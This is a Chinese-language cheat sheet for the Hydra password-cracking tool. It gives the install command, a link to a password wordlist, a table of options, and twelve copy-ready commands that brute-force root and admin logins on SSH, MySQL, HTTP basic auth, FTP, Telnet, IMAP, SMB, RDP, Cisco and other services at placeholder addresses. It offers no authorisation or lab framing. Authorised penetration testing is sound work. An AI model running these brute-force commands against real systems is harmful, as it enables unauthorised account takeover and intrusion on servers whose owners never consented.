1. 安装:
    yum -y install hydra
  2. 密码字典:
    http://file.job520.net/linux/hydra/pwd.txt
  3. 用法:
选项 说明 示例
-h 查看所有可用的命令行选项 hydra -h
-U 检查模块是否具有可选参数 hydra -U smb
-l 指定用户名 -l zhangsan
-p 指定密码 -p 123456
-C 使用冒号分隔的user:passwd格式,而不是-l/-p -C zhangsan:123456
-L 指定用户名字典文件 -L /root/user.dict
-P 指定密码字典文件 -P /root/passwd.dict
-M 指定目标IP列表文件 -M /root/ip.dict
-e 尝试“尝试登录为密码”和“空密码” -e ns
-s 指定对应模块使用的端口,例如:如果ssh端口不是默认22,这里可以指定 -s 2222
-t 指定线程数,默认16 -t 1
-vV 显示详细破解过程 -vV
-o 指定将结果输出到文件 -o /result.txt
-b 指定-o选项输出的结果信息的类型,默认为文本信息,可以自定为jsonv1和json格式。 -b json
-R 恢复先前中止/崩溃的会话(当hydra被Control-C中止,被杀死或崩溃时,它会留下一个“hydra.restore”文件,其中包含恢复会话所需的所有信息。此会话文件每5分钟写入一次。注意:hydra.restore文件不能复制到不同的平台(例如从小端到大端,或从Solaris到AIX)) -R
-I 忽略现有的恢复文件(不要等待10秒) -I
-S 执行SSL连接 -S
-f 在使用-M参数后,找到第一对登录用户和密码的时候终止破解 -f
-W 设置最大超时时间,单位秒,默认30秒 -W 60
-q 不要打印有关连接错误的消息 -q
  1. 实例:
    1. 破解 ssh:
      hydra -l root -P pwd.txt -t 线程数 xx.xx.xx.xx ssh
    2. 破解 mysql:
      hydra -l root -P pwd.txt -t 线程数 xx.xx.xx.xx mysql
    3. 破解 base 认证:
      hydra -l admin -P pwd.txt -t 线程数 xx.xx.xx.xx http-get /auth.php
    4. 破解 ftp:
      hydra -l root -P pwd.txt -t 线程数 xx.xx.xx.xx ftp
    5. 破解 telnet:
      hydra -l admin -P pwd.txt -t 线程数 xx.xx.xx.xx telnet
    6. 破解 imap:
      hydra -l root -P pwd.txt 172.20.10.12 imap PLAIN
    7. 破解 http-proxy:
      hydra -l admin -P pwd.txt http-proxy://xx.xx.xx.xx
    8. 破解 pop3:
      hydra -l root -P pwd.txt my.pop3.mail pop3
    9. 破解 smb:
      hydra -l admin -P pwd.txt xx.xx.xx.xx smb
    10. 破解 teamspeak:
      hydra -l admin -P pwd.txt xx.xx.xx.xx teamspeak
    11. 破解 cisco:
      hydra -l admin -P pwd.txt xx.xx.xx.xx cisco
    12. 破解 rdp:
      hydra -l admin -P pwd.txt xx.xx.xx.xx rdp
文档更新时间: 2020-08-08 20:40   作者:lee